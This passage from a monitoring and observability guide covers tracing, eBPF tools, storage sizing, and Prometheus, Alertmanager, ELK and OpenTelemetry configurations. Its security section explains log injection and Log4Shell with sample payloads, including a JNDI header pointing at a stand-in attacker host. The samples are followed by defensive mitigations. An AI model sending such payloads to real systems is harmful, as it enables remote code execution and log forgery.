        span.set_attribute("user.id", user_id)
        span.set_attribute("user.tier", get_user_tier(user_id))
        span.set_attribute("user.country", get_user_country(user_id))
        span.set_attribute("checkout.item_count", len(items))
        span.set_attribute("checkout.total_amount", calculate_total(items))
        span.set_attribute("feature.new_pricing", flag_enabled("new_pricing"))
        span.set_attribute("deploy.version", os.getenv("APP_VERSION"))

        # ... business logic
        return result

Sampling: trace data is more expensive than metrics, so sample it. Default: a 1-10% sampling rate. Tail-based sampling: keep 100% of errors and slow requests plus 1% of normal traffic. A head-sampling sketch follows; tail-based policies belong in the Collector (section 5.3).
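
A minimal head-sampling sketch with the OpenTelemetry Python SDK; the 10% ratio sits inside the default range quoted above:

from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.sampling import ParentBased, TraceIdRatioBased

# Root spans are sampled at 10% by trace ID; child spans follow the parent's
# decision, so each trace is kept or dropped as a whole.
provider = TracerProvider(sampler=ParentBased(root=TraceIdRatioBased(0.10)))
trace.set_tracer_provider(provider)
tracer = trace.get_tracer(__name__)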

2.11.5 Vendors & Tools

| Tool | Approach | Best for |
|---|---|---|
| Honeycomb | Native high-cardinality events | The pioneer, best UX |
| Datadog APM | Metrics + Traces + Logs in one platform | Enterprise, full-stack |
| New Relic | Same | Established vendor |
| Grafana Tempo + Loki | OSS traces + logs | Self-hosted, cost-conscious |
| Lightstep / ServiceNow | Microservice deep dives | Microservice-heavy systems |
| OpenTelemetry + ClickHouse | DIY | Maximum flexibility |

Reference: Charity Majors, Liz Fong-Jones & George Miranda, Observability Engineering (O'Reilly, 2022).

2.12 eBPF Observability — Kernel-level Visibility

2024-2026 update: eBPF-based observability (Pixie, Cilium Hubble, Parca) provides kernel-level visibility without instrumenting application code.

2.12.1 Problems with Traditional Instrumentation

Application-level instrumentation (OpenTelemetry SDK, Datadog agent):

  • Requires code changes (adding an SDK, decorators, middleware)
  • Language-specific: the Python SDK ≠ the Go SDK ≠ the Rust SDK
  • Performance overhead: 1-10% CPU, depending on sampling
  • Cannot see kernel/network internals: TCP retransmits, syscall delays, scheduler latency

2.12.2 eBPF — Observability Without Code Changes

eBPF programs run inside the kernel and can observe every syscall, network packet, and function call. No application changes are required.

┌──────────────────────────────┐
│ Application (no SDK needed)   │
│ user-space syscall            │
└─────────────┬────────────────┘
              │
              ▼
┌──────────────────────────────┐
│  Linux Kernel                 │
│  ┌────────────────────────┐  │
│  │  eBPF probes attached  │  │
│  │  - kprobes (kernel fn) │  │
│  │  - uprobes (user fn)   │  │
│  │  - tracepoints         │  │
│  │  - XDP (network)       │  │
│  └─────────┬──────────────┘  │
└────────────┼─────────────────┘
             │ ring buffer
             ▼
┌──────────────────────────────┐
│  User-space collector         │
│  → Send to backend            │
└──────────────────────────────┘

Advantages:

| Benefit | Detail |
|---|---|
| Zero code changes | Deploy a DaemonSet and get instant visibility into every pod |
| Language-agnostic | Works for Python, Go, Rust, Java, C++, anything |
| Kernel + network visibility | TCP retransmits, syscall latency, page faults: all invisible from inside the app |
| Low overhead | < 1% CPU typical |
| Production-safe | The verifier guarantees no infinite loops and no kernel panics |

Drawbacks:

| Limitation | Detail |
|---|---|
| Linux-only | Does not run on Windows/Mac (fine for servers) |
| Kernel version requirements | eBPF features need kernel 4.18+ (CO-RE: 5.5+) |
| Privileged | Needs CAP_BPF or a privileged container |
| Symbol resolution | Stripped binaries → the kernel cannot resolve function names |

2.12.3 eBPF Tools

| Tool | Use case | URL |
|---|---|---|
| Pixie (CNCF) | Auto-instrument Kubernetes apps | https://px.dev/ |
| Cilium Hubble | Network observability | https://docs.cilium.io/en/stable/gettingstarted/hubble/ |
| Parca | Continuous profiling | https://www.parca.dev/ |
| Pyroscope | Profiling | https://pyroscope.io/ |
| bcc tools | CLI tools (e.g., tcpconnect, biolatency) | https://github.com/iovisor/bcc |
| bpftrace | A DTrace-like language for eBPF | https://github.com/iovisor/bpftrace |

2.12.4 A Real Example: Pixie Auto-tracing

# Install Pixie on K8s cluster
px deploy
 
# Run pre-built scripts (no code change needed)
px run px/http_data
# → Sees ALL HTTP requests in cluster, including method, path, latency, status
 
px run px/mysql_data
# → Sees ALL MySQL queries with timings
 
px run px/dns
# → Sees DNS resolution latency

The magic: there is no instrumentation code anywhere. Pixie attaches eBPF probes in the kernel → intercepts syscalls → reconstructs application protocols (HTTP, gRPC, MySQL, Redis…).

2.12.5 Continuous Profiling with Parca/Pyroscope

Traditional profiling only runs on demand (perf, pprof). Continuous profiling captures profiles at all times with negligible overhead:

Always-on profiles → flame graphs → pinpoint CPU hotspots, memory leaks, and lock
contention down to the code line, with no extra instrumentation

Use cases:

  • Find CPU hotspots in production (the 1% function eating 30% of CPU)
  • Detect memory leaks (function X holding steadily growing memory)
  • Debug performance regressions after a deploy (compare pre/post profiles)

References:

  • Brendan Gregg, BPF Performance Tools (O'Reilly, 2019): the bible of eBPF observability
  • Liz Rice, Learning eBPF (O'Reilly, 2023): beginner-friendly
  • Cilium documentation: https://docs.cilium.io/

2.12.6 When to Use eBPF vs Application Instrumentation?

Need business-level metrics (revenue, user_id, feature_flag)?
├─ YES → Application instrumentation (OpenTelemetry SDK)
└─ NO  → Need infrastructure/network visibility?
         ├─ YES → eBPF (Pixie, Cilium Hubble, Parca)
         └─ Both → Use complementary

The best-practice 2024-2026 stack:

  1. OpenTelemetry SDK: application traces with business attributes
  2. Prometheus: infrastructure metrics (CPU, memory, network)
  3. eBPF observability (Pixie/Hubble): kernel/network deep dives
  4. Continuous profiling (Parca/Pyroscope): code-level performance
  5. A structured-events backend (Honeycomb, ClickHouse): high-cardinality drill-down

3. Estimation — Sizing Storage for the Monitoring Stack

3.1 Metrics Storage (TSDB Sizing)

Assumptions:

| Parameter | Value |
|---|---|
| Number of services | 50 |
| Metrics per service | 200 (avg, including custom + runtime + infra) |
| Unique label combinations per metric | 10 (avg) |
| Scrape interval | 15 seconds |
| Bytes per raw sample | 16 bytes (8B timestamp + 8B value) |
| Retention | 30 days |
| Compressed sample size | 1.37 bytes/sample (real-world Prometheus figure) |

Total time series:

50 services × 200 metrics × 10 label combinations = 100,000 series

Samples per day:

100,000 series × (86,400s / 15s) = 100,000 × 5,760 = 576,000,000 samples/day

Storage per day (after compression):

576M samples × 1.37 bytes ≈ 789 MB/day

Storage for 30 days of retention:

789 MB/day × 30 ≈ 23.7 GB

Takeaway: 100K series at 30-day retention needs only ~25GB; a single Prometheus node handles this comfortably. But if cardinality explodes to 10M series, that becomes ~2.3TB per 30 days, and you need Thanos/Cortex/Mimir for long-term storage.
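
The same arithmetic as a reusable sketch; the defaults are the assumptions from the tables in this section and in 3.2 below:

def tsdb_storage_gb(series: int, scrape_interval_s: int = 15,
                    bytes_per_sample: float = 1.37,
                    retention_days: int = 30) -> float:
    """Compressed Prometheus TSDB footprint for a given series count."""
    samples_per_day = series * (86_400 / scrape_interval_s)
    return samples_per_day * bytes_per_sample * retention_days / 1e9

def log_storage_tb(qps: int, lines_per_req: int = 5, line_bytes: int = 500,
                   compression: float = 0.3, index_overhead: float = 1.1,
                   retention_days: int = 90) -> float:
    """Elasticsearch footprint under the section 3.2 assumptions."""
    raw_per_day = qps * lines_per_req * line_bytes * 86_400
    return raw_per_day * compression * index_overhead * retention_days / 1e12

print(f"{tsdb_storage_gb(100_000):.1f} GB")      # ~23.7 GB for 100K series
print(f"{tsdb_storage_gb(10_000_000):,.0f} GB")  # ~2,367 GB (~2.3 TB) at 10M series
print(f"{log_storage_tb(10_000):.1f} TB")        # ~64.2 TB for 90 days of logs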

3.2 Log Storage Sizing

Assumptions:

| Parameter | Value |
|---|---|
| Total QPS (all services) | 10,000 req/s |
| Log lines per request | 5 (avg: access log, app log, DB query log, etc.) |
| Average log line size | 500 bytes (structured JSON) |
| Retention | 90 days |
| Elasticsearch index overhead | 10% (inverted index, doc values) |

Log volume per day:

10,000 req/s × 5 lines × 500 bytes × 86,400s ≈ 2.16 TB/day raw

After Elasticsearch compression (~70% savings, real-world):

2.16 TB × 0.3 ≈ 0.65 TB/day; plus 10% index overhead ≈ 0.71 TB/day

Storage for 90 days of retention:

0.71 TB/day × 90 ≈ 64 TB

Takeaway: 10K QPS needs ~64TB of Elasticsearch storage for 90 days. This is why:

  1. Log sampling is necessary (do not log 100% of requests)
  2. Log levels matter (production should normally log WARN and above, DEBUG only when needed)
  3. Elasticsearch hot/warm/cold architectures exist (SSD for 7 days, HDD for 90 days, S3 for archive)
  4. Loki is much cheaper, since it skips the full-text index

3.3 Alert Threshold Calculation

Example: deriving an error-rate alert threshold from the SLO

Assumptions:

  • SLO: 99.9% availability (30 days)
  • Error budget: 0.1% = 43.2 minutes of downtime per month

Burn rate thresholds:

| Alert | Burn Rate | Error Rate Threshold | Window |
|---|---|---|---|
| P1 | 14.4x | 14.4 × 0.1% = 1.44% | 5 minutes |
| P2 | 6x | 6 × 0.1% = 0.6% | 30 minutes |
| P3 | 1x | 1 × 0.1% = 0.1% | 6 hours |

Latency threshold calculation:

If the SLO says 99% of requests must finish in < 200ms (a P99 latency target), the latency "error budget" is the 1% of requests allowed to be slower.

Alert when the burn rate exceeds 14.4x:

14.4 × 1% = 14.4%

→ Alert when more than 14.4% of requests are slower than 200ms within a 5-minute window.


4. Security — Securing Monitoring & Logging

4.1 Log Injection Attacks

Description: an attacker embeds malicious content in input, that input gets logged, and when an admin views the log in Kibana or another web UI it triggers XSS or falsifies the log.

Attack example:

# The attacker submits this username:
username = "admin\n2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin"

# In a plaintext log, the forged line reads like a real one:
2024-01-15 10:30:45 ERROR Login failed user=admin
2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin  ← FAKE!

Log4Shell (CVE-2021-44228), one of the most serious vulnerabilities in history:

# The attacker sends this header:
User-Agent: ${jndi:ldap://attacker.com/exploit}

# Log4j resolves the JNDI lookup → downloads and executes malicious code
# → Remote Code Execution (RCE) on the server

Defenses:

| Measure | Detail |
|---|---|
| Structured logging | Use JSON: field values are escaped automatically, so newlines cannot be injected |
| Input sanitization | Strip control characters (\n, \r, \t) before logging |
| Parameterized logging | logger.info("Login failed", {"user": user_input}) instead of logger.info(f"Login failed user={user_input}") |
| Updated dependencies | Log4j >= 2.17.1, which patches the JNDI lookup |
| Output encoding | Kibana/Grafana Loki auto-escape HTML, but custom dashboards must encode output themselves |

4.2 PII (Personally Identifiable Information) in Logs

The problem: logs containing PII violate GDPR, CCPA, and PDPA (VN). For example:

{
  "message": "Payment processed",
  "user_email": "[email protected]",
  "credit_card": "4111-1111-1111-1111",
  "ip_address": "113.160.234.56",
  "phone": "+84901234567"
}

A multi-layer solution:

| Layer | Technique | Example |
|---|---|---|
| Application | Redact/mask in source code | credit_card: "****1111" |
| Pipeline | Logstash/Fluentd filters | mutate { gsub => ["message", "\d{4}-\d{4}-\d{4}-\d{4}", "****REDACTED****"] } |
| Storage | Field-level encryption in ES | Encrypt the user_email field |
| Access | RBAC in Kibana | Only the Security team sees full PII |
| Retention | Auto-delete PII after 30 days | An ILM policy in Elasticsearch |

Logstash PII Filter Example:

filter {
  # Mask credit card numbers
  mutate {
    gsub => [
      "message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
      "message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b", "[EMAIL_REDACTED]",
      "message", "\b\d{3}[-.]?\d{3}[-.]?\d{4}\b", "[PHONE_REDACTED]"
    ]
  }
 
  # Remove sensitive fields entirely
  mutate {
    remove_field => ["password", "secret", "token", "authorization"]
  }
}
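
The application-layer counterpart to the pipeline filter above, as a minimal sketch that runs before anything reaches Logstash; the patterns mirror the gsub rules and are deliberately simple:

import re

REDACTIONS = [
    (re.compile(r"\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b"), "[CARD_REDACTED]"),
    (re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b"),
     "[EMAIL_REDACTED]"),
    (re.compile(r"\b(?:0|\+84)\d{9,10}\b"), "[PHONE_REDACTED]"),  # VN phone numbers
]
DROP_FIELDS = {"password", "secret", "token", "authorization", "cookie"}

def redact(event: dict) -> dict:
    """Mask PII inside string values and drop secret fields entirely."""
    clean = {}
    for key, value in event.items():
        if key in DROP_FIELDS:
            continue
        if isinstance(value, str):
            for pattern, replacement in REDACTIONS:
                value = pattern.sub(replacement, value)
        clean[key] = value
    return clean

print(redact({"message": "card 4111-1111-1111-1111 charged",
              "user_email": "[email protected]",
              "password": "hunter2"}))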

4.3 Secure Log Transport

| Risk | Mitigation |
|---|---|
| Eavesdropping (sniffing logs in transit) | TLS 1.3 for all log shipping (Filebeat → Logstash, Logstash → ES) |
| Tampering (altering logs) | Digital signatures / HMAC on log entries; append-only storage |
| Log forging (fabricating logs) | Mutual TLS (mTLS) between shipper and collector, so only trusted agents can send |
| Replay attacks | Timestamp + nonce in log entries |

Filebeat TLS config:

output.logstash:
  hosts: ["logstash.internal:5044"]
  ssl.enabled: true
  ssl.certificate_authorities: ["/etc/pki/ca.crt"]
  ssl.certificate: "/etc/pki/filebeat.crt"
  ssl.key: "/etc/pki/filebeat.key"
  ssl.verification_mode: "full"  # Verify server cert

4.4 Access Control for Monitoring Dashboards

Monitoring dashboards hold extremely sensitive information: architecture, traffic patterns, error details, internal endpoints. If they leak, an attacker has a blueprint of your system.

| Control | Implementation |
|---|---|
| Authentication | SSO (SAML/OIDC) for Grafana/Kibana; NEVER keep the default admin/admin |
| Authorization (RBAC) | Grafana: Viewer/Editor/Admin per org. Kibana: Spaces + Roles |
| Network | Dashboards reachable only over VPN or the internal network |
| Audit | Log every dashboard access, query execution, and alert change |
| Data masking | Dashboards for non-security teams hide IPs and detailed user_ids |

4.5 Audit Trail for Monitoring Changes

Every change to the monitoring system must be audited:

| Action | Audit Record |
|---|---|
| Alert rule created/modified/deleted | Who, when, old value → new value |
| Dashboard modified | Git-based provisioning (Grafana as Code) |
| Silence/inhibition created | Who silenced it, for how long, and why |
| Log retention policy changed | Approval workflow required |
| Access granted to monitoring | RBAC change log |

Compliance requirement: SOC 2, PCI-DSS, and HIPAA all demand an audit trail for monitoring-system changes. If someone silences a critical alert and then carries out an attack, the audit trail is the evidence.


5. DevOps — Full Monitoring Stack Setup

5.1 Prometheus + Grafana + Alertmanager Stack

docker-compose-monitoring.yml:

version: "3.8"
 
networks:
  monitoring:
    driver: bridge
 
volumes:
  prometheus_data: {}
  grafana_data: {}
  alertmanager_data: {}
 
services:
  # ============================================================
  # PROMETHEUS - Metrics Collection & Storage
  # ============================================================
  prometheus:
    image: prom/prometheus:v2.50.0
    container_name: prometheus
    restart: unless-stopped
    ports:
      - "9090:9090"
    volumes:
      - ./prometheus/prometheus.yml:/etc/prometheus/prometheus.yml:ro
      - ./prometheus/alert-rules.yml:/etc/prometheus/alert-rules.yml:ro
      - prometheus_data:/prometheus
    command:
      - "--config.file=/etc/prometheus/prometheus.yml"
      - "--storage.tsdb.path=/prometheus"
      - "--storage.tsdb.retention.time=30d"
      - "--storage.tsdb.retention.size=50GB"
      - "--web.enable-lifecycle"          # Enable /-/reload endpoint
      - "--web.enable-admin-api"          # Enable admin API (careful in prod!)
      - "--storage.tsdb.min-block-duration=2h"
      - "--storage.tsdb.max-block-duration=2h"
    networks:
      - monitoring
    deploy:
      resources:
        limits:
          memory: 4G
          cpus: "2"
 
  # ============================================================
  # ALERTMANAGER - Alert Routing & Notification
  # ============================================================
  alertmanager:
    image: prom/alertmanager:v0.27.0
    container_name: alertmanager
    restart: unless-stopped
    ports:
      - "9093:9093"
    volumes:
      - ./alertmanager/alertmanager.yml:/etc/alertmanager/alertmanager.yml:ro
      - alertmanager_data:/alertmanager
    command:
      - "--config.file=/etc/alertmanager/alertmanager.yml"
      - "--storage.path=/alertmanager"
      - "--cluster.advertise-address=0.0.0.0:9093"
    networks:
      - monitoring
 
  # ============================================================
  # GRAFANA - Visualization & Dashboards
  # ============================================================
  grafana:
    image: grafana/grafana:10.3.0
    container_name: grafana
    restart: unless-stopped
    ports:
      - "3000:3000"
    environment:
      - GF_SECURITY_ADMIN_USER=admin
      - GF_SECURITY_ADMIN_PASSWORD=${GRAFANA_ADMIN_PASSWORD:-changeme}
      - GF_USERS_ALLOW_SIGN_UP=false
      - GF_AUTH_ANONYMOUS_ENABLED=false
      - GF_SERVER_ROOT_URL=https://grafana.example.com
      - GF_SMTP_ENABLED=true
      - GF_SMTP_HOST=smtp.gmail.com:587
      - GF_LOG_LEVEL=warn
    volumes:
      - grafana_data:/var/lib/grafana
      - ./grafana/provisioning/datasources:/etc/grafana/provisioning/datasources:ro
      - ./grafana/provisioning/dashboards:/etc/grafana/provisioning/dashboards:ro
      - ./grafana/dashboards:/var/lib/grafana/dashboards:ro
    networks:
      - monitoring
 
  # ============================================================
  # NODE EXPORTER - Host Metrics (CPU, Memory, Disk, Network)
  # ============================================================
  node-exporter:
    image: prom/node-exporter:v1.7.0
    container_name: node-exporter
    restart: unless-stopped
    ports:
      - "9100:9100"
    volumes:
      - /proc:/host/proc:ro
      - /sys:/host/sys:ro
      - /:/rootfs:ro
    command:
      - "--path.procfs=/host/proc"
      - "--path.rootfs=/rootfs"
      - "--path.sysfs=/host/sys"
      - "--collector.filesystem.mount-points-exclude=^/(sys|proc|dev|host|etc)($$|/)"
    networks:
      - monitoring
 
  # ============================================================
  # cADVISOR - Container Metrics
  # ============================================================
  cadvisor:
    image: gcr.io/cadvisor/cadvisor:v0.49.1
    container_name: cadvisor
    restart: unless-stopped
    ports:
      - "8080:8080"
    volumes:
      - /:/rootfs:ro
      - /var/run:/var/run:ro
      - /sys:/sys:ro
      - /var/lib/docker/:/var/lib/docker:ro
      - /dev/disk/:/dev/disk:ro
    privileged: true
    devices:
      - /dev/kmsg:/dev/kmsg
    networks:
      - monitoring

prometheus/prometheus.yml:

global:
  scrape_interval: 15s          # Default scrape interval
  evaluation_interval: 15s      # Rule evaluation interval
  scrape_timeout: 10s
 
# Alertmanager configuration
alerting:
  alertmanagers:
    - static_configs:
        - targets:
            - alertmanager:9093
 
# Load alert rules
rule_files:
  - "alert-rules.yml"
 
# Scrape targets
scrape_configs:
  # Prometheus self-monitoring
  - job_name: "prometheus"
    static_configs:
      - targets: ["localhost:9090"]
 
  # Node Exporter (host metrics)
  - job_name: "node-exporter"
    static_configs:
      - targets: ["node-exporter:9100"]
 
  # cAdvisor (container metrics)
  - job_name: "cadvisor"
    static_configs:
      - targets: ["cadvisor:8080"]
 
  # Application services (example)
  - job_name: "app-services"
    metrics_path: "/metrics"
    scrape_interval: 10s
    static_configs:
      - targets:
          - "api-gateway:8080"
          - "user-service:8081"
          - "payment-service:8082"
          - "order-service:8083"
        labels:
          env: "production"
 
  # Kubernetes service discovery (when running on Kubernetes)
  # - job_name: "kubernetes-pods"
  #   kubernetes_sd_configs:
  #     - role: pod
  #   relabel_configs:
  #     - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_scrape]
  #       action: keep
  #       regex: true
  #     - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_path]
  #       action: replace
  #       target_label: __metrics_path__
  #       regex: (.+)
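
Both the compose file and prometheus.yml above reference alert-rules.yml without showing it; a minimal sketch of what it could contain, wiring the burn-rate idea from section 2.9 into two rules (the expressions, thresholds, and runbook URL are illustrative, not prescriptive):

# prometheus/alert-rules.yml
groups:
  - name: slo-burn-rate
    rules:
      # P1: burning the 99.9% error budget at > 14.4x (see section 2.9)
      - alert: HighErrorBudgetBurn
        expr: |
          sum(rate(http_requests_total{status=~"5.."}[5m]))
            / sum(rate(http_requests_total[5m])) > 0.0144
        for: 5m
        labels:
          severity: critical
        annotations:
          summary: "Error budget burning at > 14.4x the allowed rate"
          runbook_url: "https://wiki.example.com/runbooks/error-budget-burn"

      # P3: a scrape target has disappeared
      - alert: TargetDown
        expr: up == 0
        for: 2m
        labels:
          severity: warning
        annotations:
          summary: "{{ $labels.job }} target {{ $labels.instance }} is down"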

alertmanager/alertmanager.yml:

global:
  resolve_timeout: 5m
  smtp_from: "[email protected]"
  smtp_smarthost: "smtp.gmail.com:587"
  smtp_auth_username: "[email protected]"
  smtp_auth_password: "${SMTP_PASSWORD}"
  smtp_require_tls: true
 
# Notification templates
templates:
  - "/etc/alertmanager/templates/*.tmpl"
 
# Alert routing tree
route:
  receiver: "slack-default"
  group_by: ["alertname", "severity", "service"]
  group_wait: 30s           # Wait before sending first notification
  group_interval: 5m        # Wait between grouped notifications
  repeat_interval: 4h       # Repeat if not resolved
 
  routes:
    # P1 Critical → PagerDuty + Slack
    - match:
        severity: critical
      receiver: "pagerduty-critical"
      group_wait: 10s
      repeat_interval: 1h
      continue: true       # Also send to next matching route
 
    - match:
        severity: critical
      receiver: "slack-critical"
 
    # P2 High → Slack #incidents
    - match:
        severity: high
      receiver: "slack-incidents"
      repeat_interval: 2h
 
    # P3 Warning → Slack #alerts
    - match:
        severity: warning
      receiver: "slack-alerts"
      repeat_interval: 8h
 
    # Security alerts → Security team
    - match:
        category: security
      receiver: "security-team"
      group_wait: 0s
      repeat_interval: 30m
 
# Inhibition rules (suppress lower severity when higher fires)
inhibit_rules:
  - source_match:
      severity: "critical"
    target_match:
      severity: "warning"
    equal: ["alertname", "service"]
 
  - source_match:
      severity: "critical"
    target_match:
      severity: "high"
    equal: ["alertname", "service"]
 
# Receivers
receivers:
  - name: "slack-default"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_DEFAULT}"
        channel: "#monitoring"
        title: '[{{ .Status | toUpper }}] {{ .GroupLabels.alertname }}'
        text: '{{ range .Alerts }}*{{ .Annotations.summary }}*\n{{ .Annotations.description }}\n{{ end }}'
        send_resolved: true
 
  - name: "slack-critical"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_CRITICAL}"
        channel: "#incidents"
        title: '🚨 CRITICAL: {{ .GroupLabels.alertname }}'
        text: >-
          {{ range .Alerts }}
          *Service*: {{ .Labels.service }}
          *Summary*: {{ .Annotations.summary }}
          *Runbook*: {{ .Annotations.runbook_url }}
          {{ end }}
        send_resolved: true
 
  - name: "slack-incidents"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_INCIDENTS}"
        channel: "#incidents"
        send_resolved: true
 
  - name: "slack-alerts"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_ALERTS}"
        channel: "#alerts"
        send_resolved: true
 
  - name: "pagerduty-critical"
    pagerduty_configs:
      - service_key: "${PAGERDUTY_SERVICE_KEY}"
        severity: critical
        description: '{{ .GroupLabels.alertname }}: {{ .CommonAnnotations.summary }}'
        details:
          service: '{{ .GroupLabels.service }}'
          severity: '{{ .GroupLabels.severity }}'
          runbook: '{{ .CommonAnnotations.runbook_url }}'
 
  - name: "security-team"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_SECURITY}"
        channel: "#security-alerts"
    pagerduty_configs:
      - service_key: "${PAGERDUTY_SECURITY_KEY}"
        severity: critical

5.2 ELK Stack Docker Compose

docker-compose-elk.yml:

version: "3.8"
 
networks:
  elk:
    driver: bridge
 
volumes:
  elasticsearch_data: {}
  logstash_pipeline: {}
 
services:
  # ============================================================
  # ELASTICSEARCH - Log Storage & Search Engine
  # ============================================================
  elasticsearch:
    image: docker.elastic.co/elasticsearch/elasticsearch:8.12.0
    container_name: elasticsearch
    restart: unless-stopped
    environment:
      - discovery.type=single-node
      - cluster.name=monitoring-cluster
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms2g -Xmx2g"
      - xpack.security.enabled=true
      - xpack.security.enrollment.enabled=true
      - ELASTIC_PASSWORD=${ELASTIC_PASSWORD:-changeme}
      # ILM (Index Lifecycle Management) for log rotation
      - xpack.monitoring.collection.enabled=true
    ulimits:
      memlock:
        soft: -1
        hard: -1
    volumes:
      - elasticsearch_data:/usr/share/elasticsearch/data
    ports:
      - "9200:9200"
    networks:
      - elk
    deploy:
      resources:
        limits:
          memory: 4G
 
  # ============================================================
  # LOGSTASH - Log Processing Pipeline
  # ============================================================
  logstash:
    image: docker.elastic.co/logstash/logstash:8.12.0
    container_name: logstash
    restart: unless-stopped
    volumes:
      - ./logstash/pipeline/logstash.conf:/usr/share/logstash/pipeline/logstash.conf:ro
      - ./logstash/config/logstash.yml:/usr/share/logstash/config/logstash.yml:ro
    ports:
      - "5044:5044"    # Beats input
      - "5000:5000"    # TCP input (for direct log shipping)
      - "9600:9600"    # Monitoring API
    environment:
      - "LS_JAVA_OPTS=-Xms1g -Xmx1g"
    depends_on:
      - elasticsearch
    networks:
      - elk
 
  # ============================================================
  # KIBANA - Log Visualization
  # ============================================================
  kibana:
    image: docker.elastic.co/kibana/kibana:8.12.0
    container_name: kibana
    restart: unless-stopped
    environment:
      - ELASTICSEARCH_HOSTS=http://elasticsearch:9200
      - ELASTICSEARCH_USERNAME=kibana_system
      - ELASTICSEARCH_PASSWORD=${KIBANA_PASSWORD:-changeme}
      - xpack.security.enabled=true
      - xpack.encryptedSavedObjects.encryptionKey=${KIBANA_ENCRYPTION_KEY}
    ports:
      - "5601:5601"
    depends_on:
      - elasticsearch
    networks:
      - elk
 
  # ============================================================
  # FILEBEAT - Log Shipper (runs on every host)
  # ============================================================
  filebeat:
    image: docker.elastic.co/beats/filebeat:8.12.0
    container_name: filebeat
    restart: unless-stopped
    user: root
    volumes:
      - ./filebeat/filebeat.yml:/usr/share/filebeat/filebeat.yml:ro
      - /var/lib/docker/containers:/var/lib/docker/containers:ro
      - /var/log:/var/log:ro
    depends_on:
      - logstash
    networks:
      - elk

logstash/pipeline/logstash.conf:

input {
  beats {
    port => 5044
    ssl => true
    ssl_certificate_authorities => ["/etc/pki/ca.crt"]
    ssl_certificate => "/etc/pki/logstash.crt"
    ssl_key => "/etc/pki/logstash.key"
    ssl_verify_mode => "force_peer"
  }
 
  tcp {
    port => 5000
    codec => json_lines
  }
}
 
filter {
  # ============================
  # Parse JSON logs
  # ============================
  if [message] =~ /^\{/ {
    json {
      source => "message"
      target => "parsed"
    }
    mutate {
      rename => {
        "[parsed][level]" => "log_level"
        "[parsed][service]" => "service_name"
        "[parsed][trace_id]" => "trace_id"
        "[parsed][span_id]" => "span_id"
        "[parsed][duration_ms]" => "duration_ms"
      }
    }
  }
 
  # ============================
  # PII Redaction (CRITICAL!)
  # ============================
  mutate {
    gsub => [
      # Credit card numbers
      "message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
      # Email addresses
      "message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b", "[EMAIL_REDACTED]",
      # Vietnamese phone numbers
      "message", "\b(0|\+84)\d{9,10}\b", "[PHONE_REDACTED]",
      # SSN-like patterns
      "message", "\b\d{3}-\d{2}-\d{4}\b", "[SSN_REDACTED]"
    ]
  }
 
  # Remove explicitly sensitive fields
  mutate {
    remove_field => ["password", "secret", "token", "authorization", "cookie",
                     "[parsed][password]", "[parsed][secret]", "[parsed][token]"]
  }
 
  # ============================
  # Enrich with geo data (optional)
  # ============================
  if [client_ip] {
    geoip {
      source => "client_ip"
      target => "geo"
    }
  }
 
  # ============================
  # Log injection protection
  # ============================
  mutate {
    gsub => [
      # Remove ANSI escape codes
      "message", "\e\[[0-9;]*m", "",
      # Remove null bytes
      "message", "\x00", ""
    ]
  }
 
  # ============================
  # Add metadata
  # ============================
  mutate {
    add_field => {
      "environment" => "${ENV:production}"
      "pipeline_version" => "2.0"
    }
  }
}
 
output {
  elasticsearch {
    hosts => ["elasticsearch:9200"]
    user => "elastic"
    password => "${ELASTIC_PASSWORD}"
    ssl => true
    index => "logs-%{[service_name]}-%{+YYYY.MM.dd}"
    ilm_enabled => true
    ilm_rollover_alias => "logs"
    ilm_policy => "logs-lifecycle"
  }
 
  # Debug output (disable in production)
  # stdout { codec => rubydebug }
}

5.3 OpenTelemetry Collector Configuration

otel-collector-config.yml:

receivers:
  # OTLP receiver (gRPC + HTTP)
  otlp:
    protocols:
      grpc:
        endpoint: 0.0.0.0:4317
      http:
        endpoint: 0.0.0.0:4318
        cors:
          allowed_origins: ["*"]
 
  # Prometheus receiver (scrape Prometheus-format metrics)
  prometheus:
    config:
      scrape_configs:
        - job_name: "otel-collector"
          scrape_interval: 15s
          static_configs:
            - targets: ["localhost:8888"]
 
  # Host metrics receiver
  hostmetrics:
    collection_interval: 30s
    scrapers:
      cpu: {}
      memory: {}
      disk: {}
      network: {}
      load: {}
 
processors:
  # Batch processor (buffer before export)
  batch:
    timeout: 5s
    send_batch_size: 1024
    send_batch_max_size: 2048
 
  # Memory limiter (prevent OOM)
  memory_limiter:
    check_interval: 1s
    limit_mib: 1024
    spike_limit_mib: 256
 
  # Attributes processor (add common attributes)
  attributes:
    actions:
      - key: environment
        value: "production"
        action: upsert
      - key: deployment.version
        value: "v2.1.0"
        action: upsert
 
  # Filter processor (drop noisy/unwanted telemetry)
  filter:
    error_mode: ignore
    traces:
      span:
        - 'attributes["http.target"] == "/health"'
        - 'attributes["http.target"] == "/metrics"'
        - 'attributes["http.target"] == "/readyz"'
 
  # Tail sampling (keep interesting traces, sample boring ones)
  tail_sampling:
    decision_wait: 10s
    num_traces: 50000
    expected_new_traces_per_sec: 1000
    policies:
      # Always keep error traces
      - name: errors-policy
        type: status_code
        status_code: {status_codes: [ERROR]}
      # Always keep slow traces (> 1s)
      - name: latency-policy
        type: latency
        latency: {threshold_ms: 1000}
      # Sample 10% of successful traces
      - name: probabilistic-policy
        type: probabilistic
        probabilistic: {sampling_percentage: 10}
 
exporters:
  # Export traces to Jaeger
  otlp/jaeger:
